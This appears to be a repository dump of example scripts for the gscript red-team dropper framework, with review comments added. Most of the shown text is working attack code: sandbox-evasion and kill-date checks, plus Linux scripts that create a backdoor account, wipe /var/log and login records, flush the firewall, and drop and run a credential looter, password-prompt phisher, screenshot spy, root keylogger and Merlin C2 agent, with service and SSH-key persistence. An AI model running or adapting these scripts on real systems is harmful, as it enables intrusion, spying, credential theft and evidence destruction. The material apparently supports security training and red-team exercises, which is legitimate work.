├── .gitignore
├── README.md
├── anti-re
├── kill_date.gs
├── sandbox_cpu1.gs
├── sandbox_hostname.gs
└── sandbox_user.gs
├── attack
├── linux
│ ├── add_users.gs
│ ├── delete_logs.gs
│ ├── disable_firewall.gs
│ ├── goredloot_example.gs
│ ├── goredprompt_example.gs
│ ├── goredspy_example.gs
│ ├── keylog_spy.gs
│ ├── kitten-service.gs
│ ├── kittenz-installer.gs
│ ├── merlin_example.gs
│ ├── salt_install.gs
│ ├── sshkey_persistence.gs
│ ├── sudo_persistence.gs
│ └── suid_persistence.gs
├── multi
│ ├── crypto
│ │ ├── crypto_bytes_example.gs
│ │ └── crypto_string_example.gs
│ ├── dropper
│ │ └── merlin_example.gs
│ ├── encoding
│ │ └── encoding_example.gs
│ ├── exec
│ │ ├── exec_example.gs
│ │ └── execa_example.gs
│ ├── file
│ │ ├── delete_example.gs
│ │ └── write_examples.gs
│ ├── net
│ │ ├── httpd_example.gs
│ │ ├── net_tcp_example.gs
│ │ ├── net_udp_example.gs
│ │ ├── netcat_tcp_client_example.gs
│ │ └── netcat_tcp_server_example.gs
│ ├── rand
│ │ └── rand_example.gs
│ ├── requests
│ │ └── requests_example.gs
│ ├── test
│ │ ├── bettercap.gs
│ │ └── strings.gs
│ └── time
│ │ └── time_example.gs
├── os_x
│ ├── cronjob_persistence.gs
│ ├── delete_logs.gs
│ ├── disable_SIP.gs
│ ├── disable_filevault.gs
│ ├── disable_firewall.gs
│ ├── disable_gatekeeper.gs
│ ├── disable_littlesnitch.gs
│ ├── enable_ard.gs
│ ├── enable_autologin.gs
│ ├── enable_fileshares.gs
│ ├── enable_guest.gs
│ ├── enable_remote_ssh.gs
│ ├── enable_screensharing.gs
│ ├── goredloot_example.gs
│ ├── goredprompt_example.gs
│ ├── goredspy_example.gs
│ ├── grab_clipboard.gs
│ ├── https_exfiltration.gs
│ ├── keylogger_example.gs
│ ├── launch_agent_persistence.gs
│ ├── launch_daemon_persistence.gs
│ ├── launchctl_persistence.gs
│ ├── loginhook_persistence.gs
│ ├── looter_example.gs
│ ├── merlin_example.gs
│ ├── merlin_example2.gs
│ ├── osascript_prompt.gs
│ ├── prompter_example.gs
│ ├── sshkey_persistence.gs
│ ├── su_pam_persistence.gs
│ ├── tamper_histcontrol.gs
│ ├── trap_persistence.gs
│ └── xsvc_service_persistence.gs
└── windows
│ ├── Vyrus-Demo
│ └── epicMsf.gs
│ ├── delete_event_logs.gs
│ ├── delete_volume_shadow_copy.gs
│ ├── disable_adminApprovalMode.gs
│ ├── disable_defender.gs
│ ├── disable_localAdminFilter.gs
│ ├── disable_securityCenter.gs
│ ├── disable_uac.gs
│ ├── disable_winUpdates.gs
│ ├── disable_windows_firewall.gs
│ ├── enable_adminShares.gs
│ ├── enable_installElevated.gs
│ ├── enable_rdp.gs
│ ├── enable_smbv1.gs
│ ├── enable_stickykeys.gs
│ ├── enable_wdigest_credcache.gs
│ ├── enable_winrm.gs
│ ├── force_hidden_files.gs
│ ├── keylog_spy.gs
│ ├── merlin_example.gs
│ ├── net_user_creation.gs
│ ├── netntlm_downgrade.gs
│ ├── runkey_persistence.gs
│ ├── salt_install.gs
│ ├── screenshot_spy.gs
│ ├── shrink_logsize.gs
│ ├── startup_persistence.gs
│ └── userinit_persistence.gs
├── beta
├── anti-re
│ ├── sandbox_cpu1.gs
│ ├── sandbox_hostname.gs
│ ├── sandbox_ram1.gs
│ ├── sandbox_users.gs
│ ├── sandbox_users2.gs
│ └── windows
│ │ └── vm_regkeys.gs
├── attack
│ ├── README.md
│ ├── linux
│ │ ├── delete_logs.gs
│ │ ├── disable_linux_firewall.gs
│ │ ├── keylog_spy.gs
│ │ ├── screenshot_spy.gs
│ │ ├── sshkey_persistence.gs
│ │ ├── sudo_persistence.gs
│ │ └── suid_persistence.gs
│ ├── os_x
│ │ ├── cronjob_persistence.gs
│ │ ├── delete_logs.gs
│ │ ├── enable_remote_ssh.gs
│ │ ├── example_agent.plist
│ │ ├── example_daemon.plist
│ │ ├── grab_clipboard.gs
│ │ ├── https_log_exfiltration.gs
│ │ ├── keylog_spy.gs
│ │ ├── launch_agent_persistence.gs
│ │ ├── launch_daemon_persistence.gs
│ │ ├── launchctl_persistence.gs
│ │ ├── loginhook_persistence.gs
│ │ ├── logouthook_persistence.gs
│ │ ├── osascript_prompt.gs
│ │ ├── rccommon_persistence.gs
│ │ ├── screenshot_spy.gs
│ │ ├── service_persistence.gs
│ │ ├── tamper_histcontrol.gs
│ │ └── trap_persistence.gs
│ ├── skeleton.gs
│ └── windows
│ │ ├── delete_event_logs.gs
│ │ ├── delete_volume_shadow_copy.gs
│ │ ├── disable_windows_firewall.gs
│ │ ├── keylog_spy.gs
│ │ ├── net_user_creation.gs
│ │ ├── runkey_persistence.gs
│ │ ├── screenshot_spy.gs
│ │ └── startup_persistence.gs
└── ops
│ └── ensure_admin.gs
└── troll
└── windows
├── killall.gs
├── memz.gs
└── win_viz.gs
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 |
3 | # Binaries for programs and plugins
4 | *.exe
5 | *.exe~
6 | *.dll
7 | *.so
8 | *.dylib
9 |
10 | # Test binary, build with `go test -c`
11 | *.test
12 |
13 | # Output of the go coverage tool, specifically when used with LiteIDE
14 | *.out
15 |
16 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # gscripts
2 | A repo full of example gscripts
3 |
4 | Written for [gscript](https://github.com/gen0cide/gscript)
5 |
6 | [asciinema demo](https://asciinema.org/a/183244)
7 |
8 | # Video about the framework
9 | [Defcon 26 - Gscript Presentation](https://www.youtube.com/watch?v=8yjMlMf8NpQ)
10 |
11 |
12 | # How to use the framework
13 | [Defcon 26 - Gscript Workshop](https://github.com/ahhh/presentations/blob/master/DEFCON26%20GSCRIPT%20Workshop.pdf)
14 |
--------------------------------------------------------------------------------
/anti-re/kill_date.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Kill Date
3 | // Author: ahhh
4 | // Purpose: Kill the binary if it's being run after a certain date
5 | // Tactic: Use this to give your payloads an expiration date, such that they can't be repurposed after your operation
6 | // Gscript version: 1.0.0
7 |
8 | //go_import:runtime as funtime
9 |
10 | //priority:50
11 | //timeout:75
12 |
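/**
 * Kill-date check: if the current Unix time is at or past the kill date the
 * binary terminates itself so a captured payload cannot be replayed later.
 * Reads the clock through G.time.GetUnix() and exits via G.os.TerminateSelf().
 * @returns {boolean} true when the date check passes, false after self-termination
 */
function Deploy() {
  console.log("Testing Kill Date!");
  // Unix epoch seconds (Christmas 2018). Kept numeric so the comparison below is
  // a plain numeric compare instead of relying on string-to-number coercion.
  var killDate = 1545696000;
  var currentDate = G.time.GetUnix();
  if (currentDate >= killDate) {
    console.log("Detected a time after the kill date!");
    G.os.TerminateSelf();
    return false;
  }
  console.log("Done Testing Kill Date!");
  return true;
}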
25 |
26 |
--------------------------------------------------------------------------------
/anti-re/sandbox_cpu1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_CPU_1
3 | // Author: ahhh
4 | // Purpose: Gets the computer's CPU count, if the machine only has one cpu we consider it a sandbox
5 | // Tactic: Has a low priority to run first and kill the process if it detects a sandbox
6 | // Gscript version: 1.0.0
7 |
8 | //go_import:runtime as funtime
9 |
10 |
11 | //priority:50
12 | //timeout:75
13 |
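/**
 * Sandbox heuristic: a host reporting a single logical CPU (funtime.NumCPU())
 * is treated as an analysis sandbox and the process terminates itself.
 * @returns {boolean} false after self-termination, true otherwise
 */
function Deploy() {
  console.log("Testing Sandbox CPUs!");

  var cpuCount = funtime.NumCPU();
  if (cpuCount === 1) {
    console.log("Detected a single CPU, likly a sandbox!");
    G.os.TerminateSelf();
    return false;
  }
  // Single exit path: the trailing log was previously placed after an if/else
  // that returned on both branches, so it could never run.
  console.log("Done Testing Sandbox CPUs!");
  return true;
}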
30 |
--------------------------------------------------------------------------------
/anti-re/sandbox_hostname.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Hostname
3 | // Author: ahhh
4 | // Purpose: Gets the computer's hostname, converts it to upper case, then checks it against a list of well-known sandbox hostnames
5 | // Gscript version: 1.0.0
6 | //
7 | //go_import:os as os2
8 |
9 | //priority:30
10 | //timeout:75
11 |
/**
 * Compares the upper-cased local hostname against a fixed list of hostnames
 * associated with analysis sandboxes. On a match the process terminates
 * itself via G.os.TerminateSelf().
 * @returns {boolean} false after self-termination, true otherwise
 */
function Deploy() {
  console.log("Testing Sandbox Hostname!");
  var knownSandboxHosts = [
    "TEQUILABOOMBOOM",
    "SANDBOX",
    "VIRUS",
    "MALWARE",
    "MALTEST",
    "PC",
    "PSPUBWS-PC"
  ];
  // Only element [0] of the os2.Hostname() result (the hostname string) is used.
  var hostnameResult = os2.Hostname();
  var upperHost = hostnameResult[0].toUpperCase();
  console.log("Our hostname is: "+ upperHost);
  if (knownSandboxHosts.indexOf(upperHost) !== -1) {
    console.log("Sandbox detected, exiting");
    G.os.TerminateSelf();
    return false;
  }
  console.log("Done Testing Hostname!");
  return true;
}
26 |
27 |
--------------------------------------------------------------------------------
/anti-re/sandbox_user.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users2
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a dynamic list of well known sandbox users
5 | // Gscript version: 1.0.0
6 |
7 | //go_import:os/user as user2
8 |
9 | //priority:30
10 | //timeout:75
11 |
/**
 * Compares the current user (upper-cased) against a fixed list of account
 * names associated with analysis sandboxes. On a match the process
 * terminates itself via G.os.TerminateSelf().
 * @returns {boolean} false after self-termination, true otherwise
 */
function Deploy() {
  console.log("Testing Sandbox Users 2!");
  var sandboxUsers = ["MALTEST", "TEQUILABOOMBOOM", "WILBER", "PSPUBWS"];
  // Whoami
  var currentUser = user2.Current();
  console.log("user: "+Dump(currentUser[0]));
  // NOTE(review): toUpperCase() is invoked on currentUser[0] itself, whereas
  // keylog_spy.gs reads .Username from the same user2.Current() binding —
  // confirm which form is intended.
  var userUpper = (currentUser[0]).toUpperCase();
  console.log(userUpper);
  if (sandboxUsers.indexOf(userUpper) !== -1) {
    console.log("Sandbox detected, exiting");
    G.os.TerminateSelf();
    return false;
  }
  return true;
}
--------------------------------------------------------------------------------
/attack/linux/add_users.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: add user in linux
3 | // Author: duffffffff
4 | // Purpose: conveniently add some users on linux
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Do thing right away
8 |
9 | //priority:200
10 | //timeout:150
11 |
/**
 * Creates one local account by running useradd synchronously through
 * G.exec.ExecuteCommand and prints every field of the response tuple.
 * The exit code and error are only logged, never checked, so a failed
 * useradd is visible solely in the output. Returns nothing.
 */
function Deploy() {
//adduser nameOfTheAddedUser
// useradd flags: -m create the home directory, -s login shell; the last argument is the username.
var response1 = G.exec.ExecuteCommand("useradd", ["-m", "-p", "lol123", "-s", "/bin/bash", "spoderman"]);
// Response tuple, as labelled below: [pid, stdout, stderr, exit code, go error].
console.log("Pid: "+response1[0]);
console.log("stdout: "+response1[1]);
console.log("stderr: "+response1[2]);
console.log("exit code: "+response1[3]);
console.log("go errors: "+Dump(response1[4]));
// Printed unconditionally; does not reflect whether useradd succeeded.
console.log("done adding users")
}
22 |
--------------------------------------------------------------------------------
/attack/linux/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete logs
3 | // Author: ahhh
4 | // Purpose: deleting some logs on linux
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late priority to run toward the end
8 |
9 | //priority:200
10 | //timeout:150
11 |
12 | //go_import:github.com/gen0cide/gscript/stdlib/exec as exec
13 |
/**
 * Runs a single `rm -rf` over the login-accounting files and the whole
 * /var/log tree. Uses the `exec` alias declared by the go_import above rather
 * than the G.exec binding used by the sibling scripts. Every field of the
 * response tuple is logged; none is checked. Returns nothing.
 */
function Deploy() {
//rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
var response = exec.ExecuteCommand("rm", ["-rf", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
// Response tuple, as labelled below: [pid, stdout, stderr, exit code, go error].
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+Dump(response[4]));
// Printed unconditionally; does not reflect whether rm succeeded.
console.log("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
}
--------------------------------------------------------------------------------
/attack/linux/disable_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Linux Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the linux firewall by dropping all of the iptables rules
5 | // Tactic: low priority, runs earlier
6 | // Gscript version: 1.0.0
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
8 |
9 | //priority:90
10 | //timeout:150
11 |
/**
 * Lists the current iptables rules, then flushes the chains of the default
 * table with `iptables --flush`. Both command results are logged field by
 * field but never checked.
 * @returns {boolean} always true, regardless of either command's exit code
 */
function Deploy() {
console.log("Starting Disable Linux Firewall");

// First call only lists the rules (for the log); it changes nothing.
var response = G.exec.ExecuteCommand("iptables", ["-L"]);
// Response tuple, as labelled below: [pid, stdout, stderr, exit code, go error].
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+Dump(response[4]));

// Second call is the destructive one: no -t given, so only the default table is flushed.
var response2 = G.exec.ExecuteCommand("iptables", ["--flush"]);
console.log("Pid: "+response2[0]);
console.log("stdout: "+response2[1]);
console.log("stderr: "+response2[2]);
console.log("exit code: "+response2[3]);
console.log("go errors: "+Dump(response2[4]));

console.log("Done Disable Linux Firewall");
return true;
}
32 |
--------------------------------------------------------------------------------
/attack/linux/goredloot_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedLoot
3 | // Author: ahhh
4 | // Purpose: Gathers target keys from the victim and stages (compresses / encrypts) them for exfil
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late priority to run toward the end, will compress and encrypt to a random outfile
8 | // Uses: GoRedLoot to take search and stage: https://github.com/ahhh/GoRedLoot
9 |
10 | //priority:200
11 | //timeout:200
12 |
13 | //go_import:os/user as user2
14 | //go_import:os as os2
15 |
16 | //import:/private/tmp/GoRedLoot.elf
17 |
/**
 * Writes the embedded GoRedLoot.elf asset to a randomly named file under
 * os2.TempDir(), then launches it asynchronously with the current user's
 * home directory and a random /tmp output path as arguments.
 * Asset-load and launch errors are logged but not acted on; the write result
 * is discarded. The dropped binary is not removed by this script.
 * @returns {boolean} always true
 */
function Deploy() {
console.log("Starting GoRedLoot");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var lootBin = GetAssetAsBytes("GoRedLoot.elf");
console.log("errors: "+Dump(lootBin[1]));

// Get user home directory; the search root is HomeDir with a trailing slash.
var user = user2.Current();
console.log(user[0]);
var searchDir = user[0].HomeDir+"/";

// Getting a random name and dropping file (6 lowercase alphanumerics under TempDir()).
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaNumericString(6);
var name = naming.toLowerCase();
name = temppath+"/"+name;
// Return value of the write is ignored, so a failed drop is not detected here.
G.file.WriteFileFromBytes(name, lootBin[0]);
console.log("dropped the GoRedLoot binary here: "+name);

// Create random out file (5 lowercase alphanumerics under /tmp)
var outfile = G.rand.GetAlphaNumericString(5);
outfile = "/tmp/"+outfile.toLowerCase();

// Executing child proc; proc[0].Process.Pid is read before proc[1] is checked,
// so presumably a failed launch would throw here rather than log — confirm.
var proc = G.exec.ExecuteCommandAsync(name, [searchDir, outfile]);
console.log("err: "+Dump(proc[1]));
console.log("pid: "+proc[0].Process.Pid);

console.log("Done GoRedLoot");
return true;
}
--------------------------------------------------------------------------------
/attack/linux/goredprompt_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: GoRedPrompt to take screenshots: https://github.com/ahhh/GoRedPrompt
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os2
13 |
14 | //import:/private/tmp/GoRedPrompt.elf
15 |
/**
 * Writes the embedded GoRedPrompt.elf asset to a randomly named file under
 * os2.TempDir(), then launches it asynchronously with a random /tmp output
 * path as its only argument. Asset-load and launch errors are logged but not
 * acted on; the write result is discarded. The dropped binary is not removed.
 * @returns {boolean} always true
 */
function Deploy() {
console.log("Starting GoRedPrompt");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var promptBin = GetAssetAsBytes("GoRedPrompt.elf");
console.log("errors: "+Dump(promptBin[1]));

// Getting a random name and dropping file (6 lowercase letters under TempDir()).
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaString(6);
var name = naming.toLowerCase();
name = temppath+"/"+name;
// Return value of the write is ignored, so a failed drop is not detected here.
G.file.WriteFileFromBytes(name, promptBin[0]);
console.log("dropped the goredprompt binary here: "+name);

// Create random out file (5 lowercase alphanumerics under /tmp)
var outfile = G.rand.GetAlphaNumericString(5);
outfile = "/tmp/"+outfile.toLowerCase();

// Executing child proc; proc[0].Process.Pid is read before proc[1] is checked,
// so presumably a failed launch would throw here rather than log — confirm.
var proc = G.exec.ExecuteCommandAsync(name, [outfile]);
console.log("err: "+Dump(proc[1]));
console.log("pid: "+proc[0].Process.Pid);

console.log("Done GoRedPrompt");
return true;
}
--------------------------------------------------------------------------------
/attack/linux/goredspy_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every half hour for the next 24 hours (48 x 1800)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Uses: GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os/user as user2
13 | //go_import:os as os2
14 |
15 | //import:/private/tmp/GoRedSpy.elf
16 |
/**
 * Writes the embedded GoRedSpy.elf asset to a randomly named file under
 * os2.TempDir(), creates a random /tmp output directory, and launches the
 * binary asynchronously with -count 48 / -delay 1800s (48 captures, 30 min
 * apart, per the header). Asset-load and launch errors are logged but not
 * acted on; the write and mkdir results are discarded. Nothing is cleaned up.
 * @returns {boolean} always true
 */
function Deploy() {
console.log("Starting GoRedSpy");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var spyBin = GetAssetAsBytes("GoRedSpy.elf");
console.log("errors: "+Dump(spyBin[1]));

// Getting a random name and dropping file (4 lowercase letters under TempDir()).
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaString(4);
var name = naming.toLowerCase();
name = temppath+"/"+name;
// Return value of the write is ignored, so a failed drop is not detected here.
G.file.WriteFileFromBytes(name, spyBin[0]);
console.log("dropped the goredspy binary here: "+name);

// Create random out dir (3 lowercase letters under /tmp); mkdir result is ignored.
var outdir = G.rand.GetAlphaString(3);
outdir = "/tmp/"+outdir.toLowerCase();
G.exec.ExecuteCommand("/bin/mkdir", [outdir]);

// Executing child proc; proc[0].Process.Pid is read before proc[1] is checked,
// so presumably a failed launch would throw here rather than log — confirm.
var proc = G.exec.ExecuteCommandAsync(name, ["-outDir", outdir, "-count", "48", "-delay", "1800s"]);
console.log("err: "+Dump(proc[1]));
console.log("pid: "+proc[0].Process.Pid);

console.log("Done GoRedSpy");
return true;
}
--------------------------------------------------------------------------------
/attack/linux/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/skeylogger
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Tactic: Later check location of output log to retrieve keylogs
8 | // Uses: simple key keylogger https://github.com/gsingh93/simple-key-logger
9 | // Note: must be run as root
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | //go_import:os as os2
15 | //go_import:os/user as user2
16 |
17 | //import:/private/tmp/skeylogger
18 |
19 |
/**
 * If running as root, writes the embedded skeylogger asset to a randomly
 * named file under os2.TempDir() and launches it asynchronously with
 * `-l /tmp/log`. Non-root callers only get a log line.
 * NOTE(review): the file header says output goes to /var/log/skeylogger, but
 * the argument passed below is /tmp/log — one of the two is stale.
 * The asset-load error and the write result are not checked; the launch
 * result is discarded entirely.
 * @returns {boolean} always true, whether or not anything was started
 */
function Deploy() {
console.log("starting execution of keylogger spy");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var keylogBin = GetAssetAsBytes("skeylogger");
console.log("errors: "+Dump(keylogBin[1]));
// Resolve the current user; only .Username is used, for the root check below.
var user = user2.Current();
console.log("Our user is: "+user[0].Username);
if (user[0].Username == "root") {
// Getting a random string (4 lowercase letters) for the drop path under TempDir().
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaString(4);
var name = naming.toLowerCase();
name = temppath+"/"+name;
// Return value of the write is ignored, so a failed drop is not detected here.
G.file.WriteFileFromBytes(name, keylogBin[0]);
console.log("dropped the spy binary here: "+name);
// Launched async; the [process, error] result is dropped, so launch failures are silent.
G.exec.ExecuteCommandAsync(name, ["-l", "/tmp/log"]);
} else {
console.log("Must be run as root");
}
console.log("Done keylogger spy");
return true;
}
43 |
--------------------------------------------------------------------------------
/attack/linux/kitten-service.gs:
--------------------------------------------------------------------------------
1 | // Kittenz Service
2 | // Title: Kittenz Service
3 | // Author: VitaPluvia
4 | // Purpose: Persistently copies kitten.jpg into /tmp
5 | // Gscript version: 1.0.0
6 |
7 | //import:./kitten.jpg
8 |
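/**
 * Keeps /tmp/kitten.jpg present: re-creates it from the embedded asset
 * whenever G.file.CheckExists reports it missing, pausing with Sleep(3)
 * between checks. The loop is intentionally endless, so on the normal path
 * this never returns.
 * @returns {boolean} false only if the asset itself could not be loaded
 */
function Deploy () {
  var systemKitten = '/tmp/kitten.jpg';
  var kittenAsset = GetAssetAsBytes('kitten.jpg');
  // [0] is the content, [1] the load error (the sibling scripts log it as
  // "errors"); without this guard a failed load would loop forever writing
  // whatever [0] holds.
  if (kittenAsset[1]) {
    console.log('kitten.jpg asset could not be loaded: ' + kittenAsset[1]);
    return false;
  }
  var kittenBytes = kittenAsset[0];

  while (true) {
    if (!G.file.CheckExists(systemKitten)) {
      G.file.WriteFileFromBytes(systemKitten, kittenBytes);
    }
    Sleep(3);
  }
}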
24 |
--------------------------------------------------------------------------------
/attack/linux/kittenz-installer.gs:
--------------------------------------------------------------------------------
1 | // Kittenz Service Installer
2 | // Title: Kittenz Service Installer
3 | // Author: VitaPluvia
4 | // Purpose: Installs kitten-service placing kitten.jpg in /tmp persistently
5 | // Gscript version: 1.0.0
6 |
7 | //import:/root/kitten-service
8 | //go_import:github.com/gen0cide/gscript/x/svc as svc
9 |
// Service identity and filesystem placement for the kittenz demo service.
var SERVICE_NAME = 'kittenz';
var SERVICE_DIR = '/usr/bin/';
var SERVICE_PATH = [SERVICE_DIR, SERVICE_NAME].join('');
// Progress messages printed by Deploy, listed in the order they are used.
var PLACING_KITTENZ_MSG = ['Placing kitten-service into ', SERVICE_PATH, '...'].join('');
var CREATE_SERVICE_MSG = 'Creating Service...';
var SERVICE_SANITY_MSG = 'Checking Service Health...';
var INSTALLING_SERVICE_MSG = 'Installing kittenz Service!';
var STARTING_SERVICE_MSG = 'Starting kittenz!';
var SERVICE_COMPLETE = 'Service Started.';

// Service definition handed to svc.NewFromJSON: the binary at SERVICE_PATH is
// run with no arguments from SERVICE_DIR.
var settings = {
  name: SERVICE_NAME,
  display_name: 'kittenz',
  description: 'kittenz are in your system!',
  arguments: [],
  executable_path: SERVICE_PATH,
  working_directory: SERVICE_DIR,
  options: {}
};
29 |
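/**
 * Aborts the script when a Go error value comes back from the svc binding.
 * @param {object|null|undefined} obj - a Go error (truthy, exposes Error())
 *   or a nullish value meaning "no error"
 * @returns {undefined} when obj is falsy
 * @throws {Error} whose message is 'Error: ' followed by obj.Error(); before
 *   throwing it drops into DebugConsole() and logs the message
 */
function handleError (obj) {
  if (!obj) {
    return;
  }
  DebugConsole();
  var message = obj.Error();
  console.log(message);
  // Concatenated into the message: a second argument to Error() is not part
  // of the message, so passing obj.Error() separately produced a bare
  // "Error: " with the Go text lost.
  throw new Error('Error: ' + message);
}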
37 |
/**
 * Installs the embedded kitten-service binary at SERVICE_PATH, then creates,
 * validates, installs and starts it as a system service through the svc
 * binding using the module-level `settings`. Each service-layer step goes
 * through handleError, which throws on a Go error.
 * @returns {boolean} false if the binary could not be written, true once the
 *   service has been started
 */
function Deploy () {
  var serviceBinary = GetAssetAsBytes('kitten-service');

  console.log(PLACING_KITTENZ_MSG);
  var writeErr = G.file.WriteFileFromBytes(SERVICE_PATH, serviceBinary[0]);
  if (writeErr) {
    console.log(writeErr);
    return false;
  }

  console.log(CREATE_SERVICE_MSG);
  var created = svc.NewFromJSON(settings);
  handleError(created[1]);
  var service = created[0];

  console.log(SERVICE_SANITY_MSG);
  handleError(service.CheckConfig(true)[1]);

  console.log(INSTALLING_SERVICE_MSG);
  handleError(service.Install(true));

  console.log(STARTING_SERVICE_MSG);
  handleError(service.Start());

  console.log(SERVICE_COMPLETE);
  return true;
}
67 |
--------------------------------------------------------------------------------
/attack/linux/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.elf
12 |
13 | //go_import:os as os
14 |
/**
 * Writes the embedded merlinagent.elf asset to a randomly named file under
 * os.TempDir() and launches it asynchronously with a single empty-string
 * argument. Asset-load, write and launch errors are logged but not acted on.
 * NOTE(review): `fullpath` and `errors` are assigned without `var`, so they
 * become implicit globals rather than locals of Deploy.
 * @returns {boolean} always true
 */
function Deploy() {
console.log("Starting to drop merlin binary");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var merlinBin = GetAssetAsBytes("merlinagent.elf");
console.log("errors: "+Dump(merlinBin[1]));
// Getting a random string (4 lowercase letters) for the drop path under TempDir().
var temppath = os.TempDir();
var naming = G.rand.GetAlphaString(4);
naming = naming.toLowerCase();
fullpath = temppath+"/"+naming;
console.log("file name: "+ fullpath);
// Write payload; the result is logged, not checked.
errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
console.log("errors: "+Dump(errors));
// Run payload: [""] passes one empty argument, not zero arguments.
var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
console.log("errors: "+Dump(running[1]));
return true
}
--------------------------------------------------------------------------------
/attack/linux/salt_install.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Salt Example
3 | // Author: ahhh
4 | // Purpose: Drops salt installer, executes it, sets up minion config, restarts minion. WIP.
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:salt.minion
12 | //import:bootstrap-salt.sh
13 |
14 | //go_import:os as os
15 |
/**
 * Writes the embedded bootstrap-salt.sh to /tmp/install.sh and runs it with
 * `sh ... -P`; if that passes the check below, writes the embedded
 * salt.minion asset to /etc/salt/minion and restarts the salt-minion service.
 * NOTE(review): `installpath`, `Ierrors`, `fullpath` and `errors` are assigned
 * without `var` and so become implicit globals.
 * NOTE(review): run[1] is logged as "errors", but in the sibling scripts
 * index [1] of the ExecuteCommand tuple is stdout — the `run[1] == ""` gate
 * below may be testing for empty stdout rather than for success; confirm.
 * @returns {boolean} always true
 */
function Deploy() {
console.log("Starting to drop salt.minion config");
// Getting our assets: [0] is the content, [1] the load error (only logged).
var saltBin = GetAssetAsBytes("salt.minion");
console.log("errors: "+Dump(saltBin[1]));
var saltInstaller = GetAssetAsBytes("bootstrap-salt.sh")
console.log("errors: "+Dump(saltInstaller[1]));

// Write and Run installer (fixed path, not randomised like the other droppers).
installpath = "/tmp/install.sh";
console.log("file name: "+ installpath);
Ierrors = G.file.WriteFileFromBytes(installpath, saltInstaller[0]);
console.log("Ierrors: "+Dump(Ierrors));
var run = G.exec.ExecuteCommand("sh", [installpath, "-P"]);
console.log("errors: "+Dump(run[1]));

if (run[1] == "") {
// Write our config file
fullpath = "/etc/salt/minion";
console.log("file name: "+ fullpath);
errors = G.file.WriteFileFromBytes(fullpath, saltBin[0]);
console.log("errors: "+Dump(errors));
// restart the minion so it picks up the new config; result only logged
var running = G.exec.ExecuteCommand("service", ["salt-minion", "restart"]);
console.log("errors: "+Dump(running[1]));
}

return true
}
45 |
--------------------------------------------------------------------------------
/attack/linux/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to users accounts
4 | // Gscript version: 1.0.0
5 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
6 | // Note: Assumes ssh key access is already enabled
7 |
8 | //priority:110
9 | //timeout:75
10 |
11 | //go_import:os as os
12 | //go_import:os/user as user
13 |
14 | //import:/private/tmp/id_rsa.pub
15 |
/**
 * Adds the embedded id_rsa.pub to the current user's authorized_keys:
 * creates ~/.ssh if os.Stat reports it missing, then either writes a new
 * authorized_keys file or appends to the existing one. Only the user
 * returned by user.Current() is touched, despite the header's "users accounts".
 * Errors from the asset load, mkdir, write and append are logged or discarded,
